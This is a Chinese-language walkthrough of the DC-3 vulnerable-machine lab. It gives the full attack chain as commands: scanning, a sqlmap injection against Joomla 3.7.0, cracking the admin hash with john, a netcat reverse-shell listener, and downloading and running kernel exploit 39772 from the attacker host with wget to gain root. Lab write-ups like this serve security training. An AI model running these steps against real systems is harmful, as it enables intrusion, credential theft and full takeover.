DC-3渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.149)
**一.信息收集**
-扫描靶机
nmap -sP 192.168.229.0/24
-扫描端口
nmap -sV -p- 192.168.229.149
-扫描站点信息
whatweb 192.168.229.149
-扫web目录
dirsearch -u 192.168.229.149 -e * -x 404,403
得到信息:cms:Joomla 3.7.0 扫描到后台登录页面/administrator,/README.txt
**二.漏洞查找**
-搜索Joomla的漏洞
searchsploit joomla 3.7.0
发现他有一个sql注入漏洞,打开文件有exp,给出了注入点
**三.漏洞利用**
-sql注入,用sqlmap
sqlmap -u "http://192.168.120.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --batch --dbs
就用sqlmap把管理员账号密码跑出来,发现密码加密
-用john爆破加密密码
john --wordlist=/usr/share/john/password.lst teat
把加密密码复制在test文件里,爆破出来密码是snoopy
-反弹shell
登录进入后台,发现有文件上传点,上传反弹shell文件(文件见主机渗透文件夹),再用netcat 开启监听,再访问上传的shell的网站路径(配合前面的web目录扫描及网站上面的信息推断出上传的位置),得到一个虚拟shell
nc -vlp 8888
**四.Linux提权**
-查看当前系统的信息
cat /etc/issue //查看当前系统发行信息 Ubuntu 16.04
cat /proc/version //查看当前系统版本信息 Linux 4.4.0-21-generic
-搜索操作系统漏洞
searchsploit ubuntu 16.04
发现有提权漏洞(Privilege Escalation),这里我们使用通用4.4.x版本的提权方式
locate /linux/local/39772.txt //查看完整路径
cat /usr/share/exploitdb/exploits/linux/local/39772.txt //查看文件,最后给出了exp下载地址
-利用exp提权
下载到家目录下,用jar解压,并在当前页面用python开启HTTP服务
python3 http.server 8888 //去浏览器访问看是否开启成功
再回到虚拟shell,从服务器上下载exp,解压,执行
wget http://192.168.229.132:8888/39772/39772/exploit.tar
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
得到root权限
-查找flag
find / -name * flag *
tac /root/the-flag.txt